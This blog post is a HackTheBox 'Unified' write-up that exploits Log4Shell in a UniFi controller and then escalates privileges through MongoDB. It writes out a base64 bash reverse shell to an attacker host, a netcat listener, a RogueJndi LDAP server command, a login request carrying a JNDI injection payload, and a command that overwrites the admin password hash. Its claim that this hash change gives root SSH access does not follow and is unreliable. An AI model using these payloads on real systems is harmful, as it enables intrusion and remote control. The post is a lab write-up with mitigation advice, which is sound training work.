EvolevBoard

Contact us

HackTheBox: Unified Writeup

admin Avatar
admin

Overview

Unified is a Linux-based HackTheBox machine featuring a UniFi Network Controller application vulnerable to Log4j (CVE-2021-44228). This writeup details the exploitation process from initial access through Log4j RCE to privilege escalation via MongoDB manipulation.

Reconnaissance

Port Scanning

We start with a comprehensive port scan:

nmap -T4 -p- -A -Pn <HTB_IP>

Open Ports:

  • 22/tcp – OpenSSH 8.2p1 Ubuntu
  • 6789/tcp – IBM DB2 Admin (possibly UniFi related)
  • 8080/tcp – HTTP Proxy (redirects to /manage)
  • 8443/tcp – SSL/HTTPS – UniFi Network Controller
  • 8843/tcp – SSL/HTTPS (UniFi related)
  • 8880/tcp – HTTP service

The presence of UniFi Network Controller on port 8443 is the primary attack surface.

Web Application Analysis

Browsing to https://<HTB_IP>:8443 reveals the UniFi Network Controller login page. The application is running a version vulnerable to Log4j (CVE-2021-44228).

Initial Access

Log4j Exploitation (CVE-2021-44228)

The UniFi Network Controller is vulnerable to Log4Shell, a critical remote code execution vulnerability in Apache Log4j. We can exploit this through the login endpoint.

Setting Up the Exploit

  1. Prepare the reverse shell payload (base64 encoded):echo 'bash -c bash -i >& /dev/tcp/<Attacker_ip>/1234 0>&1' | base64 This produces a base64-encoded payload like: YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTMyLzEyMzQgMD4mMQo=
  2. Set up a listener:nc -lvnp 1234
  3. Use RogueJndi to host the malicious LDAP server:java -jar RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTMyLzEyMzQgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname <Attacker_ip>

Exploiting via Burp Suite

Intercept the login request and inject the Log4j payload in a field that gets logged:

Request:

POST /api/login HTTP/1.1
Host: <HTB_IP>:8443
Content-Length: 70
Content-Type: application/json; charset=utf-8
Accept: */*
Origin: https://<HTB_IP>:8443
Referer: https://<HTB_IP>:8443/manage/account/login?redirect=%2Fmanage

{"username":"admin","password":"admin","remember":"${jndi:ldap://<Attacker_ip>/whatever}","strict":true}

The remember field contains the Log4j payload: ${jndi:ldap://<Attacker_ip>/whatever}

When the application logs this value, it triggers the JNDI lookup, which connects to our malicious LDAP server and executes the reverse shell payload.

Reverse Shell

After the payload is executed, we receive a reverse shell connection on our listener. We now have initial access to the system.

Privilege Escalation

MongoDB Enumeration

After gaining initial access, we enumerate running services:

ps aux | grep mongo

MongoDB is running, likely on the default port 27117. The UniFi application uses MongoDB to store its configuration and user data.

MongoDB Credential Manipulation

We can connect to MongoDB and manipulate the admin user’s password hash:

  1. Connect to MongoDB:mongo --port 27117 ace
  2. Update the administrator password hash:db.admin.update( {"_id" : ObjectId("61ce278f46e0fb0012d47ee4")}, {$set:{"x_shadow" : "$6$U9M8qi9zCuJWzbZe$qphgvULzJWTXf248AysIPONmbASqUGUMw468rACD2UM/7.xbF4EQUE3UnA1pbP0k0kSphlaU3WTMMeAvAl8AM1"}} ) This updates the administrator’s password hash. The hash corresponds to a known password (in this case, we generate a hash for “administrator”).
  3. Generate a new password hash (if needed):mkpasswd -m sha-512 administrator This generates a SHA-512 password hash for the password “administrator”.

SSH Access as Root

After updating the MongoDB password hash, we can SSH into the system as root:

ssh root@<HTB_IP>

When prompted, enter the password: administrator (or whatever password we set the hash for).

Alternative: Direct Root Access

If MongoDB manipulation doesn’t work or we find another method, we can also check for:

  • SUID binaries
  • Sudo misconfigurations
  • Writable files executed by root
  • Other common privilege escalation vectors

Root Flag

Once we have root access, we can retrieve the root flag:

cat /root/root.txt

Key Takeaways

  1. Log4j Vulnerability: The Log4Shell vulnerability (CVE-2021-44228) is a critical RCE vulnerability that affects many Java applications. Always keep Log4j updated to version 2.17.0 or later.
  2. JNDI Injection: JNDI lookups can be exploited to execute arbitrary code when user input is logged without proper sanitization.
  3. MongoDB Security: MongoDB instances should be properly secured with authentication and network restrictions. Default configurations often allow local access without authentication.
  4. Password Hash Manipulation: Modifying password hashes in databases can provide unauthorized access if the application doesn’t implement additional security controls.

Mitigation Recommendations

  • Update Log4j: Immediately update to Log4j 2.17.0 or later, or apply the appropriate patches for your version
  • Input Sanitization: Implement proper input validation and sanitization, especially for data that gets logged
  • MongoDB Security:
    • Enable authentication on MongoDB
    • Restrict network access to MongoDB (bind to localhost only if not needed externally)
    • Use strong passwords and implement proper access controls
  • Network Segmentation: Isolate database servers from web applications where possible
  • Monitoring: Implement logging and monitoring to detect JNDI lookup attempts and unauthorized database access
  • Least Privilege: Run services with minimal required privileges
  • Regular Updates: Keep all software components updated with the latest security patches

This writeup is for educational purposes only. Always ensure you have proper authorization before performing any security testing.

Leave a Reply

Your email address will not be published. Required fields are marked *